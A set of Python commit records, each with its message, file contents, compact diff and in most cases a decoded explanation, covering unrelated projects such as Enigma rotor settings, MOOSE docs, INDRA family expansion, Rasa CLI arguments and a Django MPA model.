Update Default_Settings.py
components/Default_Settings.py
components/Default_Settings.py
#Sequences of actual rotors used in WWII, format is name, sequences, turnover notch(es)
rotor_sequences = {
    'I': ('EKMFLGDQVZNTOWYHXUSPAIBRCJ', ('Q')),
    'II': ('AJDKSIRUXBLHWTMCQGZNPYFVOE', ('E')),
    'III': ('BDFHJLCPRTXVZNYEIWGAKMUSQO', ('V')),
    'IV': ('ESOVPZJAYQUIRHXLNFTGKDCMWB', ('J')),
    'V': ('VZBRGITYUPSDNHLXAWMJQOFECK', ('Z')),
    'VI': ('JPGVOUMFYQBENHZRDKASXLICTW', ('Z', 'M')),
    'VII': ('NZJHGRCXMYSWBOUFAIVLPEKQDT', ('Z', 'M')),
    'VIII': ('FKQHTLXOCBJSPDZRAMEWNIUYGV', ('Z', 'M')),
    'IC': ('DMTWSILRUYQNKFEJCAZBPGXOHV', ('Q')),  #civilian
    'IIC': ('HQZGPJTMOBLNCIFDYAWVEUSRKX', ('Q')),  #civilian
    'IIIC': ('UQNTLSZFMREHDPXKIBVYGJCWOA', ('Q')),  #civilian
    'BETA': ('LEYJVCNIXWPBQMDRTAKZGFUHOS', None),  #Position 4 Only
    'GAMMA': ('FSOKANUERHMBTIYCWLQPZXVGJD', None)  #Position 4 Only
}

#Simple letter substitutions before the sequence is sent back through the rotors. Notably a letter cannot be encoded as itself here.
reflector_sequences = {
    'A': 'EJMZALYXVBWFCRQUONTSPIKHGD',
    'B': 'YRUHQSLDPXNGOKMIEBFZCWVJAT',
    'C': 'FVPJIAOYEDRZXWGCTKUQSBNMHL',
    'B Thin': 'ENKQAUYWJICOPBLMDXZVFTHRGS',
    'C Thin': 'RDOBJNTKVEHMLFCWZAXGYIPSUQ',
    'None': 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'  #Early models had no reflector
}

#Entry wheel for Enigma I
ETW = {
    'Standard': 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',
    'Navy': 'QWERTZIOPASDFGHJKLYXCVBNM'
}
Python
0.000001
@@ -1368,16 +1368,17 @@ 'QWERTZ +U IOPASDFG
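Decoded, the one-character fix restores the missing 'U' in the Navy entry wheel:

    'Navy': 'QWERTZUIOPASDFGHJKLYXCVBNM'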
6ddbfbf4f4ccd0350e6066ef30967489f1e504d0
Allow for <RESIDUAL> to be present in markdown
python/MooseDocs/tree/app_syntax.py
python/MooseDocs/tree/app_syntax.py
#pylint: disable=missing-docstring
#* This file is part of the MOOSE framework
#* https://www.mooseframework.org
#*
#* All rights reserved, see COPYRIGHT for full restrictions
#* https://github.com/idaholab/moose/blob/master/COPYRIGHT
#*
#* Licensed under LGPL 2.1, please see LICENSE for details
#* https://www.gnu.org/licenses/lgpl-2.1.html
#pylint: enable=missing-docstring

import sys
import collections
import logging
import json

import anytree

import mooseutils

from MooseDocs import common
from MooseDocs.tree.syntax import SyntaxNode, MooseObjectNode, ActionNode, MooseObjectActionNode

LOG = logging.getLogger(__name__)

REGISTER_PAIRS = [('Postprocessor', 'UserObjects/*'),
                  ('AuxKernel', 'Bounds/*')]

def app_syntax(exe, remove=None, allow_test_objects=False, hide=None, alias=None):
    """
    Creates a tree structure representing the MooseApp syntax for the given executable.
    """
    common.check_type('exe', exe, str)
    common.check_type('remove', remove, (type(None), dict, list, set))
    common.check_type('hide', hide, (type(None), dict, list, set))
    common.check_type('allow_test_objects', allow_test_objects, bool)

    try:
        raw = mooseutils.runExe(exe, ['--json', '--allow-test-objects'])
        raw = raw.split('**START JSON DATA**\n')[1]
        raw = raw.split('**END JSON DATA**')[0]
        tree = json.loads(raw, object_pairs_hook=collections.OrderedDict)
    except Exception as e: #pylint: disable=broad-except
        LOG.error("Failed to execute the MOOSE executable '%s':\n%s", exe, e.message)
        sys.exit(1)

    root = SyntaxNode('', None)
    for key, value in tree['blocks'].iteritems():
        node = SyntaxNode(key, root)
        __syntax_tree_helper(node, value)

    hidden = set()
    if isinstance(hide, dict):
        for value in hide.itervalues():
            hidden.update(value)
    elif isinstance(hide, (list, set)):
        hidden.update(hide)

    if hidden:
        for node in anytree.PreOrderIter(root):
            if node.fullpath in hidden:
                node.hidden = True

    # Remove
    removed = set()
    if isinstance(remove, dict):
        for value in remove.itervalues():
            removed.update(value)
    elif isinstance(remove, (list, set)):
        removed.update(remove)

    if removed:
        for node in anytree.PreOrderIter(root):
            if any(n.fullpath == prefix for n in node.path for prefix in removed):
                node.removed = True

    if not allow_test_objects:
        for node in anytree.PreOrderIter(root):
            if node.groups and all([group.endswith('TestApp') for group in node.groups]):
                node.removed = True

    # Alias
    if alias:
        for node in anytree.PreOrderIter(root):
            for k, v in alias.iteritems():
                if node.fullpath == k:
                    node.alias = unicode(v)

    # Remove <RESIDUAL>
    for node in anytree.PreOrderIter(root):
        if node.name.endswith('<RESIDUAL>'):
            node.name = node.name[:-10]

    return root

def __add_moose_object_helper(name, parent, item):
    """
    Helper to handle the Postprocessor/UserObject and Bounds/AuxKernel special case.
    """
    node = MooseObjectNode(name, parent, item)

    for base, parent_syntax in REGISTER_PAIRS:
        if ('moose_base' in item) and (item['moose_base'] == base) and \
           (item['parent_syntax'] == parent_syntax):
            node.removed = True

def __syntax_tree_helper(parent, item):
    """
    Tree builder helper function.

    This investigates the JSON nodes and builds the proper input file tree for MooseDocs.
    """
    if item is None:
        return

    if 'actions' in item:
        for key, action in item['actions'].iteritems():
            if ('parameters' in action) and action['parameters'] and \
               ('isObjectAction' in action['parameters']):
                MooseObjectActionNode(key, parent, action)
            else:
                ActionNode(key, parent, action)

    if 'star' in item:
        __syntax_tree_helper(parent, item['star'])

    if ('types' in item) and item['types']:
        for key, obj in item['types'].iteritems():
            __add_moose_object_helper(key, parent, obj)

    if ('subblocks' in item) and item['subblocks']:
        for k, v in item['subblocks'].iteritems():
            node = SyntaxNode(k, parent)
            __syntax_tree_helper(node, v)

    if ('subblock_types' in item) and item['subblock_types']:
        for k, v in item['subblock_types'].iteritems():
            __add_moose_object_helper(k, parent, v)
Python
0.000003
@@ -2995,16 +2995,55 @@ UAL%3E'):%0A + node.alias = node.fullpath%0A
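Decoded, nodes whose names end in <RESIDUAL> now also keep their full path as an alias before the suffix is trimmed:

    if node.name.endswith('<RESIDUAL>'):
        node.alias = node.fullpath
        node.name = node.name[:-10]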
64bd44d4338d57a68ff07527d1d2c3b37960c63b
call parent filter, cleanup
web/impact/impact/v1/views/mentor_program_office_hour_list_view.py
web/impact/impact/v1/views/mentor_program_office_hour_list_view.py
# MIT License
# Copyright (c) 2019 MassChallenge, Inc.

from django.db.models import Value as V
from django.db.models.functions import Concat

from impact.v1.views.base_list_view import BaseListView
from impact.v1.helpers import (
    MentorProgramOfficeHourHelper,
)

ID_FIELDS = ['mentor_id', 'finalist_id']
NAME_FIELDS = ['mentor_name', 'finalist_name']


class MentorProgramOfficeHourListView(BaseListView):
    view_name = "office_hour"
    helper_class = MentorProgramOfficeHourHelper

    def filter(self, qs):
        if not self.request.query_params.keys():
            return qs
        if self._has_participant_filter(NAME_FIELDS):
            return self._filter_by_participant_name(qs)
        if self._has_participant_filter(ID_FIELDS):
            param_items = self.request.query_params.dict().items()
            return self._filter_by_participant_id(qs, param_items)

    def _filter_by_participant_name(self, qs):
        params = self.request.query_params
        mentor_name = params.get('mentor_name', None)
        finalist_name = params.get('finalist_name', None)
        if mentor_name:
            return self._generate_name_query(qs, 'mentor', mentor_name)
        if finalist_name:
            return self._generate_name_query(qs, 'finalist', finalist_name)
        return qs.none()

    def _generate_name_query(self, qs, user, name_value):
        first_name_field = '{}__first_name'.format(user)
        last_name_field = '{}__last_name'.format(user)
        result = qs.annotate(
            full_name=Concat(
                first_name_field, V(' '), last_name_field)).filter(
                    full_name__icontains=name_value)
        return result

    def _filter_by_participant_id(self, qs, param_items):
        filter_values = {
            key: value for key, value in param_items
            if key in ID_FIELDS and value.isdigit()}
        if filter_values:
            return qs.filter(**filter_values)
        return qs.none()

    def _has_participant_filter(self, fields):
        return any(
            key in self.request.query_params.keys() for key in fields)
Python
0
@@ -502,32 +502,64 @@ lter(self, qs):%0A + qs = super().filter(qs)%0A if not s @@ -2080,19 +2080,21 @@ -key +field in self @@ -2126,19 +2126,21 @@ s() for -key +field in fiel
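Decoded, filter() now chains to the parent implementation before applying its own logic, and the _has_participant_filter comprehension renames key to field:

    def filter(self, qs):
        qs = super().filter(qs)
        if not self.request.query_params.keys():
            return qs

    def _has_participant_filter(self, fields):
        return any(
            field in self.request.query_params.keys() for field in fields)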
30e2ab7568dc00b9a8617c87269310691c19ed95
variable-length fields are initialized with a width of None
serial/core/_util.py
serial/core/_util.py
""" Private utility functions. """ from collections import namedtuple Field = namedtuple("Field", ("name", "pos", "dtype", "width")) def field_type(name, pos, dtype): """ Create a Field tuple. """ try: pos = slice(*pos) width = pos.stop - pos.start except TypeError: # pos is an int width = 1 return Field(name, pos, dtype, width) def strftime(time, timefmt): """ Return a datetime-like object as a formatted string. This is a replacement for datetime.strftime that handles years before 1900. Only the most basic fields are supported, and it is not locale-aware. """ datetime = [] pos = 0 while pos < len(timefmt): char = timefmt[pos] if char == strftime._esc: pos += 1 try: fmt, get = strftime._fields[timefmt[pos]] except KeyError: raise ValueError("unknown strftime field: {0:s}".format(s)) except IndexError: raise ValueError("timefmt cannot end with escape character") char = format(get(time), fmt) datetime.append(char) pos += 1 return "".join(datetime) # Iniitialize these values once instead of with every function call. strftime._esc = "%" strftime._fields = { strftime._esc: ("s", lambda time: strftime._esc), "d": ("02d", lambda time: time.day), "f": ("06d", lambda time: time.microsecond), "H": ("02d", lambda time: time.hour), "I": ("02d", lambda time: time.hour%12), "M": ("02d", lambda time: time.minute), "m": ("02d", lambda time: time.month), "p": ("s", lambda time: "AM" if t.hour < 12 else "PM"), # no locale "S": ("02d", lambda time: time.second), "Y": ("04d", lambda time: time.year), "y": ("02d", lambda time: time.year%100)}
Python
0.998252
@@ -242,16 +242,100 @@ e(*pos)%0A + except TypeError: # pos is an int%0A width = 1%0A else:%0A try:%0A @@ -363,24 +363,28 @@ s.start%0A + + except TypeE @@ -388,38 +388,119 @@ peError: # -pos is an int%0A +stop is None%0A # Variable-width field; width is determined during encode/decode.%0A widt @@ -499,25 +499,28 @@ width = -1 +None %0A return
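Decoded, field_type() gains a nested try so a slice with stop=None marks a variable-width field:

    try:
        pos = slice(*pos)
    except TypeError:  # pos is an int
        width = 1
    else:
        try:
            width = pos.stop - pos.start
        except TypeError:  # stop is None
            # Variable-width field; width is determined during encode/decode.
            width = None
    return Field(name, pos, dtype, width)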
d50b47cfe7df1a0c526189521b39625466615fcc
Add log indexes
radar/radar/models/logs.py
radar/radar/models/logs.py
from datetime import datetime

from sqlalchemy import event, DDL, Column, Integer, DateTime, String, text, Index
from sqlalchemy.dialects import postgresql
from sqlalchemy.orm import relationship

from radar.database import db


class Log(db.Model):
    __tablename__ = 'logs'

    id = Column(Integer, primary_key=True)
    date = Column(DateTime(timezone=True), nullable=False, default=datetime.utcnow, server_default=text('now()'))
    type = Column(String, nullable=False)
    user_id = Column(Integer)
    user = relationship('User', primaryjoin='User.id == Log.user_id', foreign_keys=[user_id])
    data = Column(postgresql.JSONB)

Index('logs_date_idx', Log.date)
Index('logs_type_idx', Log.type)
Index('logs_user_idx', Log.user_id)

Index('logs_patient1_idx', Log.data['patient_id'].astext.cast(Integer), postgresql_where=Log.type == 'VIEW_PATIENT')
Index('logs_patient2_idx', Log.data[('new_data', 'patient_id')].astext.cast(Integer), postgresql_where=Log.type == 'INSERT')
Index('logs_patient3_idx', Log.data[('original_data', 'patient_id')].astext.cast(Integer), postgresql_where=Log.type == 'UPDATE')
Index('logs_patient4_idx', Log.data[('new_data', 'patient_id')].astext.cast(Integer), postgresql_where=Log.type == 'UPDATE')
Index('logs_patient5_idx', Log.data[('original_data', 'patient_id')].astext.cast(Integer), postgresql_where=Log.type == 'DELETE')

Index('logs_table_name_idx', Log.data['table_name'].astext, postgresql_where=Log.type.in_(['INSERT', 'UPDATE', 'DELETE']))


def log_changes(cls):
    event.listen(cls.__table__, 'after_create', DDL("""
        CREATE TRIGGER {0}_log_changes
        AFTER INSERT OR UPDATE OR DELETE ON {0}
        FOR EACH ROW EXECUTE PROCEDURE log_changes()
    """.format(cls.__tablename__)))
    return cls


event.listen(db.Model.metadata, 'before_create', DDL("""
    CREATE OR REPLACE FUNCTION log_changes() RETURNS TRIGGER AS $body$
    DECLARE
        user_id INTEGER;
    BEGIN
        BEGIN
            user_id = current_setting('radar.user_id');
        EXCEPTION WHEN OTHERS THEN
            user_id = NULL;
        END;

        IF (TG_OP = 'UPDATE') THEN
            INSERT INTO logs (
                type,
                user_id,
                data
            ) VALUES (
                'UPDATE',
                user_id,
                json_build_object(
                    'table_name', TG_TABLE_NAME,
                    'original_data', row_to_json(OLD)::jsonb,
                    'new_data', row_to_json(NEW)::jsonb,
                    'query', current_query()
                )::jsonb
            );
            RETURN NEW;
        ELSIF (TG_OP = 'DELETE') THEN
            INSERT INTO logs (
                type,
                user_id,
                data
            ) VALUES (
                'DELETE',
                user_id,
                json_build_object(
                    'table_name', TG_TABLE_NAME,
                    'original_data', row_to_json(OLD)::jsonb,
                    'query', current_query()
                )::jsonb
            );
            RETURN OLD;
        ELSIF (TG_OP = 'INSERT') THEN
            INSERT INTO logs (
                type,
                user_id,
                data
            ) VALUES (
                'INSERT',
                user_id,
                json_build_object(
                    'table_name', TG_TABLE_NAME,
                    'new_data', row_to_json(NEW)::jsonb,
                    'query', current_query()
                )::jsonb
            );
            RETURN NEW;
        ELSE
            RAISE WARNING '[log_action] Unknown action: %% at %%', TG_OP, now();
            RETURN NULL;
        END IF;
    END;
    $body$
    LANGUAGE plpgsql
"""))

event.listen(db.Model.metadata, 'after_drop', DDL("""
    DROP FUNCTION IF EXISTS log_changes()
"""))
Python
0.000002
@@ -736,16 +736,119 @@ er_id)%0A%0A +Index('logs_user_date_idx', Log.user_id, Log.date)%0AIndex('logs_user_type_idx', Log.user_id, Log.type)%0A%0A Index('l
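Decoded, two composite indexes are appended after the single-column ones:

    Index('logs_user_date_idx', Log.user_id, Log.date)
    Index('logs_user_type_idx', Log.user_id, Log.type)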
abb00ac993154071776488b5dcaef32cc2982f4c
Fix broken functional tests on windows
test/functional/master/test_endpoints.py
test/functional/master/test_endpoints.py
import os

import yaml

from test.framework.functional.base_functional_test_case import BaseFunctionalTestCase
from test.functional.job_configs import BASIC_JOB


class TestMasterEndpoints(BaseFunctionalTestCase):

    def _start_master_only_and_post_a_new_job(self):
        master = self.cluster.start_master()
        build_resp = master.post_new_build({
            'type': 'directory',
            'config': yaml.safe_load(BASIC_JOB.config[os.name])['BasicJob'],
            'project_directory': '/tmp',
        })
        build_id = build_resp['build_id']
        return master, build_id

    def test_cancel_build(self):
        master, build_id = self._start_master_only_and_post_a_new_job()
        master.cancel_build(build_id)
        master.block_until_build_finished(build_id)
        self.assert_build_has_canceled_status(build_id=build_id)

    def test_get_artifact_before_it_is_ready(self):
        master, build_id = self._start_master_only_and_post_a_new_job()

        # Since we didn't start any slaves so the artifacts is actually not ready.
        _, status_code = master.get_build_artifacts(build_id)
        self.assertEqual(status_code, 202)

        # Cancel the started build just to speed up teardown (avoid teardown timeout waiting for empty queue)
        master.cancel_build(build_id)
Python
0.000002
@@ -3,16 +3,33 @@ port os%0A +import tempfile%0A%0A import y @@ -32,16 +32,16 @@ rt yaml%0A - %0Afrom te @@ -224,16 +224,120 @@ Case):%0A%0A + def setUp(self):%0A super().setUp()%0A self._project_dir = tempfile.TemporaryDirectory()%0A%0A def @@ -618,14 +618,30 @@ y': -'/tmp' +self._project_dir.name ,%0A
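Decoded, the patch imports tempfile, adds a setUp() that creates a per-test temporary directory, and posts that directory instead of the hard-coded '/tmp' (the part that broke on Windows):

    def setUp(self):
        super().setUp()
        self._project_dir = tempfile.TemporaryDirectory()

            'project_directory': self._project_dir.name,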
b90d9ce7745aeef2d8d562d19a8cd6836b40eaa6
Fix handling partof closure in expand families
indra/tools/expand_families.py
indra/tools/expand_families.py
from __future__ import print_function, unicode_literals, absolute_import
from builtins import dict, str
import logging
import itertools
from copy import deepcopy
from indra.preassembler.hierarchy_manager import HierarchyManager, \
    hierarchies as default_hierarchies
from indra.databases import hgnc_client
from indra.statements import Agent, Complex, Evidence
from indra.preassembler.grounding_mapper import GroundingMapper

logger = logging.getLogger(__name__)


class Expander(object):
    def __init__(self, hierarchies=None):
        if hierarchies is None:
            self.entities = default_hierarchies['entity']
        else:
            self.entities = hierarchies['entity']

    def expand_families(self, stmts):
        """Generate statements by expanding members of families and complexes.
        """
        new_stmts = []
        for stmt in stmts:
            # Put together the lists of families, with their members. E.g.,
            # for a statement involving RAF and MEK, should return a list of
            # tuples like [(BRAF, RAF1, ARAF), (MAP2K1, MAP2K2)]
            families_list = []
            for ag in stmt.agent_list():
                ag_children = self.get_children(ag)
                # If the agent has no children, then we use the agent itself
                if len(ag_children) == 0:
                    families_list.append([ag])
                # Otherwise, we add the tuple of namespaces/IDs for the children
                else:
                    families_list.append(ag_children)
            # Now, put together new statements frmo the cross product of the
            # expanded family members
            for ag_combo in itertools.product(*families_list):
                # Create new agents based on the namespaces/IDs, with
                # appropriate name and db_refs entries
                child_agents = []
                for ag_entry in ag_combo:
                    # If we got an agent, or None, that means there were no
                    # children; so we use the original agent rather than
                    # construct a new agent
                    if ag_entry is None or isinstance(ag_entry, Agent):
                        new_agent = ag_entry
                    # Otherwise, create a new agent from the ns/ID
                    elif isinstance(ag_entry, tuple):
                        # FIXME FIXME FIXME
                        # This doesn't reproduce agent state from the original
                        # family-level statements!
                        ag_ns, ag_id = ag_entry
                        new_agent = _agent_from_ns_id(ag_ns, ag_id)
                    else:
                        raise Exception('Unrecognized agent entry type.')
                    # Add agent to our list of child agents
                    child_agents.append(new_agent)
                # Create a copy of the statement
                new_stmt = deepcopy(stmt)
                # Replace the agents in the statement with the newly-created
                # child agents
                new_stmt.set_agent_list(child_agents)
                # Add to list
                new_stmts.append(new_stmt)
        return new_stmts

    def get_children(self, agent, ns_filter='HGNC'):
        if agent is None:
            return []
        # Get the grounding for the agent
        (ns, id) = agent.get_grounding()
        # If there is no grounding for this agent, then return no children
        # (empty list)
        if ns is None or id is None:
            return []
        # Get URI for agent
        ag_uri = self.entities.get_uri(ns, id)
        # Look up the children for this family
        children_uris = self.entities.get_children(ag_uri)
        if not children_uris:
            return []
        # Parse children URI list into namespaces and ID
        children_parsed = []
        for child_uri in children_uris:
            child_ns, child_id = self.entities.ns_id_from_uri(child_uri)
            # If ns_filter is None, add in all children
            if ns_filter is None:
                children_parsed.append((child_ns, child_id))
            # Otherwise, only add children with a matching namespace
            elif child_ns == ns_filter:
                children_parsed.append((child_ns, child_id))
        return children_parsed

    def complexes_from_hierarchy(self):
        # Iterate over the partof_closure to determine all of the complexes
        # and all of their members
        all_complexes = {}
        for subunit, complexes in self.entities.partof_closure.items():
            for complex in complexes:
                complex_subunits = all_complexes.get(complex, [])
                complex_subunits.append(subunit)
                all_complexes[complex] = complex_subunits
        # Now iterate over all of the complexes and create Complex statements
        complex_stmts = []
        for complex, subunits in all_complexes.items():
            # Create an Evidence object for the statement with the URI of the
            # complex as the source_id
            ev = Evidence(source_api='famplex', source_id=complex)
            subunit_agents = [_agent_from_uri(su) for su in subunits]
            complex_stmt = Complex(subunit_agents, evidence=[ev])
            complex_stmts.append(complex_stmt)
        return complex_stmts

    def expanded_complexes_from_hierarchy(self):
        complex_stmts = self.complexes_from_hierarchy()
        expanded_complexes = self.expand_families(complex_stmts)
        return expanded_complexes


def _agent_from_uri(uri):
    ag_ns, ag_id = HierarchyManager.ns_id_from_uri(uri)
    agent = _agent_from_ns_id(ag_ns, ag_id)
    return agent


def _agent_from_ns_id(ag_ns, ag_id):
    # Add the ID as a placeholder name
    agent = Agent(ag_id)
    # If we have a proper grounding, add to db_refs
    if ag_id is not None:
        agent.db_refs[ag_ns] = ag_id
    # Now standardize db_refs and set standardized name
    GroundingMapper.standardize_agent_name(agent, standardize_refs=True)
    agent.db_refs['TEXT'] = agent.name
    return agent
Python
0
@@ -4521,18 +4521,16 @@ complex -es in self @@ -4557,60 +4557,10 @@ sure -.items() :%0A - for complex in complexes:%0A @@ -4621,36 +4621,32 @@ %5B%5D)%0A - complex_subunits @@ -4662,20 +4662,16 @@ ubunit)%0A -
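Decoded, complexes_from_hierarchy() stops calling .items() and drops the inner loop, treating partof_closure as an iterable of (subunit, complex) pairs; a reconstruction:

    for subunit, complex in self.entities.partof_closure:
        complex_subunits = all_complexes.get(complex, [])
        complex_subunits.append(subunit)
        all_complexes[complex] = complex_subunits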
bde7322df85371c67fefe7169c2b6efb5e7717f6
Update rasa/cli/arguments/test.py
rasa/cli/arguments/test.py
rasa/cli/arguments/test.py
import argparse
from typing import Union

from rasa.constants import DEFAULT_MODELS_PATH, DEFAULT_CONFIG_PATH

from rasa.cli.arguments.default_arguments import (
    add_stories_param,
    add_model_param,
    add_nlu_data_param,
    add_endpoint_param,
)
from rasa.model import get_latest_model


def set_test_arguments(parser: argparse.ArgumentParser):
    add_model_param(parser, add_positional_arg=False)

    core_arguments = parser.add_argument_group("Core Test Arguments")
    add_test_core_argument_group(core_arguments)

    nlu_arguments = parser.add_argument_group("NLU Test Arguments")
    add_test_nlu_argument_group(nlu_arguments)


def set_test_core_arguments(parser: argparse.ArgumentParser):
    add_test_core_model_param(parser)
    add_test_core_argument_group(parser)


def set_test_nlu_arguments(parser: argparse.ArgumentParser):
    add_model_param(parser, add_positional_arg=False)
    add_test_nlu_argument_group(parser)


def add_test_core_argument_group(
    parser: Union[argparse.ArgumentParser, argparse._ActionsContainer]
):
    add_stories_param(parser, "test")
    parser.add_argument(
        "--max-stories", type=int, help="Maximum number of stories to test on."
    )
    parser.add_argument(
        "--output",
        type=str,
        default="results",
        help="Output path for any files created during the evaluation.",
    )
    parser.add_argument(
        "--e2e",
        "--end-to-end",
        action="store_true",
        help="Run an end-to-end evaluation for combined action and "
        "intent prediction. Requires a story file in end-to-end "
        "format.",
    )
    add_endpoint_param(parser)
    parser.add_argument(
        "--fail-on-prediction-errors",
        action="store_true",
        help="If a prediction error is encountered, an exception "
        "is thrown. This can be used to validate stories during "
        "tests, e.g. on travis.",
    )
    parser.add_argument(
        "--url",
        type=str,
        help="If supplied, downloads a story file from an URL and "
        "trains on it. Fetches the data by sending a GET request "
        "to the supplied URL.",
    )


def add_test_nlu_argument_group(
    parser: Union[argparse.ArgumentParser, argparse._ActionsContainer]
):
    add_nlu_data_param(parser)

    parser.add_argument(
        "--report",
        required=False,
        nargs="?",
        const="reports",
        default=None,
        help="Output path to save the intent/entity metrics report.",
    )
    parser.add_argument(
        "--successes",
        required=False,
        nargs="?",
        const="successes.json",
        default=None,
        help="Output path to save successful predictions.",
    )
    parser.add_argument(
        "--errors",
        required=False,
        default="errors.json",
        help="Output path to save model errors.",
    )
    parser.add_argument(
        "--histogram",
        required=False,
        default="hist.png",
        help="Output path for the confidence histogram.",
    )
    parser.add_argument(
        "--confmat",
        required=False,
        default="confmat.png",
        help="Output path for the confusion matrix plot.",
    )

    cross_validation_arguments = parser.add_argument_group("Cross Validation")
    cross_validation_arguments.add_argument(
        "--cross-validation",
        action="store_true",
        default=False,
        help="Switch on cross validation mode. Any provided model will be ignored.",
    )
    cross_validation_arguments.add_argument(
        "-c",
        "--config",
        type=str,
        default=DEFAULT_CONFIG_PATH,
        help="Model configuration file (cross validation only).",
    )
    cross_validation_arguments.add_argument(
        "-f",
        "--folds",
        required=False,
        default=10,
        help="Number of cross validation folds (cross validation only).",
    )


def add_test_core_model_param(parser: argparse.ArgumentParser):
    default_path = get_latest_model(DEFAULT_MODELS_PATH)
    parser.add_argument(
        "-m",
        "--model",
        nargs="+",
        default=[default_path],
        help="Path to a pre-trained model. If it is a 'tar.gz' file that model file "
        "will be used. If it is a directory, the latest model in that directory "
        "will be used. If multiple 'tar.gz' files are provided, all those models "
        "will be compared.",
    )
Python
0
@@ -2034,17 +2034,16 @@ e from a -n URL and
2a243c893ac8a4ddadd98f6fbb4ef5628a6d7607
Support single-ended slices on Tries
dispatch/util/trie.py
dispatch/util/trie.py
from ..constructs import Instruction


class Trie(object):
    BUCKET_LEN = 1
    BUCKET_MASK = (2**BUCKET_LEN)-1

    def __init__(self):
        self.children = [None for _ in range(2**Trie.BUCKET_LEN)]
        self.value = None

    def __setitem__(self, key, value):
        assert type(value) == Instruction
        node = self
        for bucket in [(key >> i) & Trie.BUCKET_MASK for \
                i in range(64, -1, -Trie.BUCKET_LEN)]:
            if not node.children[bucket]:
                node.children[bucket] = Trie()
            node = node.children[bucket]
        node.value = value

    def __getitem__(self, item):
        if type(item) in (int, long):
            node = self
            for bucket in [(item >> i) & Trie.BUCKET_MASK for \
                    i in range(64, -1, -Trie.BUCKET_LEN)]:
                if not node.children[bucket]:
                    raise KeyError()
                node = node.children[bucket]
            return node.value
        elif type(item) == slice:
            uncommon_bits = (item.stop ^ item.start).bit_length()

            node = self
            for bucket in [(item.start >> i) & Trie.BUCKET_MASK for \
                    i in range(64, uncommon_bits, -Trie.BUCKET_LEN)]:
                if not node.children[bucket]:
                    raise KeyError()
                node = node.children[bucket]

            return [v for v in iter(node) if item.start <= v.address < item.stop][::item.step]

    def __iter__(self):
        if self.value:
            yield self.value
        for child in filter(None, self.children):
            for v in child:
                yield v

    def __contains__(self, item):
        node = self
        for bucket in [(item >> i) & Trie.BUCKET_MASK for \
                i in range(64, -1, -Trie.BUCKET_LEN)]:
            if not node.children[bucket]:
                return False
            node = node.children[bucket]
        return True

    def __delitem__(self, key):
        node = self
        for bucket in [(key >> i) & Trie.BUCKET_MASK for \
                i in range(64, -1, -Trie.BUCKET_LEN)]:
            if not node.children[bucket]:
                raise KeyError()
            node = node.children[bucket]
        if node.value:
            del node.value
Python
0
@@ -1024,16 +1024,283 @@ slice:%0A + start = item.start%0A stop = item.stop%0A if start is None:%0A start = 0%0A if stop is None:%0A # 128 bits max address. Seems big enough for practical purposes%0A stop = 0xFFFFFFFFFFFFFFFF%0A @@ -1324,25 +1324,15 @@ = ( -item. stop %5E -item. star @@ -1400,21 +1400,16 @@ et in %5B( -item. start %3E%3E @@ -1688,21 +1688,16 @@ ode) if -item. start %3C= @@ -1709,21 +1709,16 @@ dress %3C -item. stop%5D%5B::
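Decoded, the slice branch now substitutes defaults for open-ended bounds before computing the common prefix (the later lookups switch from item.start/item.stop to the local start/stop as well):

    start = item.start
    stop = item.stop
    if start is None:
        start = 0
    if stop is None:
        # 128 bits max address. Seems big enough for practical purposes
        stop = 0xFFFFFFFFFFFFFFFF
    uncommon_bits = (stop ^ start).bit_length()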
3d878557a5e2d4f39474b1ca3df8af9012fd4303
Make the MpaDesignation optional for an MPA; Allows adding undesignated mpas.
lingcod/mpa/models.py
lingcod/mpa/models.py
from django.contrib.gis.db import models
from django.contrib.auth.models import User, Group
from django.conf import settings
from lingcod.common.utils import LookAtKml
from lingcod.manipulators.manipulators import *
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic


class MpaDesignation(models.Model):
    """Model used to represent the designation of the MPA

    ======================  ==============================================
    Attribute               Description
    ======================  ==============================================
    ``name``                Designation of the MPA
    ``acronym``             The acronym for this MPA designation
    ``poly_outline_color``  Hex Color for rendering the outline/border
    ``poly_fill_color``     Hex Color for rendering the polygon area
    ======================  ==============================================
    """
    name = models.TextField(verbose_name="Designation Name")
    acronym = models.CharField(max_length=10, unique=True, verbose_name="Designation Acronym")
    poly_outline_color = models.CharField(max_length=8, default="ffffffff", verbose_name="Hex Color for rendering outline/border")
    poly_fill_color = models.CharField(max_length=8, default="ff0000ff", verbose_name="Hex Color for rendering polygon area")
    url = models.URLField(verify_exists=False,verbose_name="URL to more info on this MPA Designation")

    def __unicode__(self):
        return "(%s) %s" % (self.acronym, self.name)


class Mpa(models.Model):
    """Model used for representing marine protected areas or MPAs

    ======================  ==============================================
    Attribute               Description
    ======================  ==============================================
    ``user``                Owner of the MPA
    ``name``                Name of the MPA
    ``date_created``        When the MPA was created. Is not changed on
                            updates.
    ``date_modified``       When the MPA geometry was last updated.
    ``geometry_orig``       PolygonField representing the MPA boundary as
                            originally drawn by the user
    ``geometry_final``      PolygonField representing the MPA boundary
                            after postprocessing.
    ``content_type``        Content type of the associated Array (Generic
                            One-to-Many)
    ``object_id``           pk of the specific array object
    ``array``               Use to access the associated Array (read-only)
    ======================  ==============================================
    """
    user = models.ForeignKey(User)
    name = models.TextField(verbose_name="MPA Name")
    date_created = models.DateTimeField(auto_now_add=True, verbose_name="Date Created")
    date_modified = models.DateTimeField(auto_now=True, verbose_name="Date Modified")
    geometry_orig = models.PolygonField(srid=settings.GEOMETRY_DB_SRID, null=True, blank=True, verbose_name="Original MPA boundary")
    geometry_final = models.PolygonField(srid=settings.GEOMETRY_DB_SRID, null=True, blank=True, verbose_name="Final MPA boundary")
    # Array relation fields
    content_type = models.ForeignKey(ContentType, blank=True, null=True)
    object_id = models.PositiveIntegerField(blank=True,null=True)
    array = generic.GenericForeignKey('content_type', 'object_id')
    designation = models.ForeignKey(MpaDesignation)

    objects = models.GeoManager()

    class Meta:
        abstract=True

    class Options:
        manipulators = [ ClipToStudyRegionManipulator ]

    def __unicode__(self):
        return self.name

    def geom_as_kml(self):
        """ returns the final geometry as a kml geometry string projected into wgs84 """
        wgs84_geom = self.geometry_final.transform(4326, clone=True)
        return wgs84_geom.kml

    def lookAtKml(self):
        """ Get the kml for a camera perspective looking at the MPA's final geometry """
        return LookAtKml( self.geometry_final )

    def kmlOrigGeom(self, style_domain):
        self.geometry_orig.transform(4326)
